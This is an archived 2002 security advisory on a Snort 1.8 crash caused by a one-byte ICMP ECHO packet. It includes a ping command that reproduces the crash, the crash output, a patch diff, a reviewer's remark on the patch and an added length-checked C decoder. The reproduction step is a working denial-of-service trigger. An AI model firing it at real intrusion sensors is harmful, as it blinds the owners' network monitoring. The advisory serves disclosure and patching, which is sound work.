[UNIX] Snort Core Dump Vulnerability
From: support@securiteam.com
Date: 01/20/02
From: support@securiteam.com To: list@securiteam.com Date: Sun, 20 Jan 2002 19:02:48 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Snort Core Dump Vulnerability
------------------------------------------------------------------------
SUMMARY
It is possible to cause Snort <http://www.snort.org/>, an open source
network intrusion detection tool, to core dump by sending it an extremely
small ICMP ECHO packet.
DETAILS
Vulnerable systems:
Snort version 1.8 and prior (without the patch)
Example:
Run snort:
# snort -dev host 192.168.0.3 and 192.168.0.1
Ping 192.168.0.1 from 192.168.0.3 with one byte of data in the payload:
# ping -c 1 -s 1 192.168.0.1
Snort's output is shown below:
-*> Snort! <*-
Version 1.8.3 (Build 88)
By Martin Roesch (roesch@sourcefire.com, www.snort.org)
01/10-11:34:43.898282 0:80:AD:78:83:BB -> 0:E0:18:C4:52:76 type:0x800 len:0x2B
192.168.0.3 -> 192.168.0.1 ICMP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:29 DF
Type:8 Code:0 ID:9435 Seq:0 ECHO
Segmentation fault (core dumped)
Patch:
--- olddecode.h Thu Jan 10 15:47:48 2002
+++ decode.h Thu Jan 10 12:15:33 2002
@@ -105,7 +105,7 @@
#define IP_HEADER_LEN 20
#define TCP_HEADER_LEN 20
#define UDP_HEADER_LEN 8
-#define ICMP_HEADER_LEN 8
+#define ICMP_HEADER_LEN 4
#define TH_FIN 0x01
#define TH_SYN 0x02
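Review bot: the new value on the "+#define ICMP_HEADER_LEN 4" line carries no comment saying what those 4 bytes cover, and the hunk does not show the code that compares packet lengths against it. Four bytes is only the ICMP type, code and checksum; the ECHO ID and Seq fields printed in the crash output sit in the following four bytes, so any decoder path that reads them needs its own length check once this minimum drops from 8. Suggest a comment on the define stating that it is the common header only, and a separate named constant for the echo header instead of reusing this one.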
This has been committed to the Snort 1.8 branch of Snort CVS and is
included in build 90.
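A length-checked ICMP decode, as an added example that is not Snort's code: it accepts the 4-byte common header as the minimum, as the patched constant does, and checks the echo fields and payload separately. The names decode_icmp, icmp_info and ICMP_ECHO_LEN are assumptions made here, and the sample bytes are constructed from the logged values (DgmLen:29 minus IpLen:20 gives 9 ICMP bytes).

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define ICMP_HEADER_LEN 4  /* type, code, checksum: the value in the patched decode.h */
#define ICMP_ECHO_LEN   8  /* assumption: common header plus 16-bit id and 16-bit seq */
#define ICMP_ECHOREPLY  0
#define ICMP_ECHO       8

typedef struct {
    uint8_t  type, code;
    int      has_echo;     /* 1 only when id/seq were inside the buffer */
    uint16_t id, seq;
    const uint8_t *data;   /* NULL when no payload bytes follow the header */
    size_t   dlen;
} icmp_info;

/* Constructed sample: type 8, code 0, checksum left as zero, id 9435, seq 0,
 * and one data byte, matching the fields in the advisory's Snort output. */
static const uint8_t sample_echo[9] = { 8, 0, 0x00, 0x00, 0x24, 0xDB, 0x00, 0x00, 0x41 };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
/* Returns 0 on success, -1 if the buffer is shorter than the fields to be read. */
int decode_icmp(const uint8_t *pkt, size_t len, icmp_info *out)
{
    size_t off = ICMP_HEADER_LEN;
    if (pkt == NULL || out == NULL || len < ICMP_HEADER_LEN)
        return -1;                      /* not even type/code/checksum present */
    *out = (icmp_info){ .type = pkt[0], .code = pkt[1] };  /* other fields zeroed */
    if (out->type == ICMP_ECHO || out->type == ICMP_ECHOREPLY) {
        if (len < ICMP_ECHO_LEN)
            return -1;                  /* truncated echo: never read bytes 4..7 */
        out->id = rd16(pkt + 4);
        out->seq = rd16(pkt + 6);
        out->has_echo = 1;
        off = ICMP_ECHO_LEN;
    }
    out->dlen = len - off;              /* len >= off is guaranteed by the checks above */
    out->data = out->dlen ? pkt + off : NULL;
    return 0;
}

int main(void)
{
    icmp_info i = {0};
    int rc = decode_icmp(sample_echo, sizeof sample_echo, &i);
    printf("rc=%d id=%u seq=%u dlen=%zu\n", rc, (unsigned)i.id, (unsigned)i.seq, i.dlen);
    return rc != 0;
}
```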
ADDITIONAL INFORMATION
The information has been provided by Sinbad <mailto:securitymail@263.net>
and Martin Roesch <mailto:roesch@sourcefire.com>.